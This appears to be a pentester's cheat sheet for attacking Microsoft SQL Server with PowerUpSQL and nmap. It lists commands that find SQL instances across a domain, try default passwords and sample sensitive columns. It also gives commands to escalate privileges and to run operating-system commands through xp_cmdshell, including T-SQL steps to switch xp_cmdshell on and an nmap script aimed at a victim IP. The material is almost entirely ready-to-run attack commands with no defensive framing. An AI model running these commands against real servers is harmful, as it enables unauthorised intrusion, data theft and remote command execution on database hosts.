SQL

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

Idenntify SQL instances

Authenticated user

Get-SQLInstanceDomain [| Get-SQLServerInfo]

Unauthenticated user

Get-SQLInstanceScanUDP

Attempt to login with a domain account

Get-SQLConnectionTestThreaded

Attempt to login with default password

Get-SQLServerDefaultLoginPw

List DB, tables, columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

Search column names for a given keyword

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

Escalate via MSSQL

Invoke-SQLAudit [-exploit]

RCE

Invoke-SQLOSCmd

Crawling database link

Get-SQLServerLink
Get-SQLServerLinkCrawl
Get-SQLQuery -Instance "<SERVER1>" -Query 'EXEC "<SERVER2>".master..xp_cmdshell "whoami /all"'

Enable XP_CMDSHELL

Type one line at a time.

EXEC sp_configure 'show advanced options', 1;  
go  
RECONFIGURE;  
go  
EXEC sp_configure 'xp_cmdshell', 1;  
go  
RECONFIGURE;  
go  
xp_cmdshell '<cmd>'
go

Nmap RCE

nmap -Pn -n --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="<cmd>"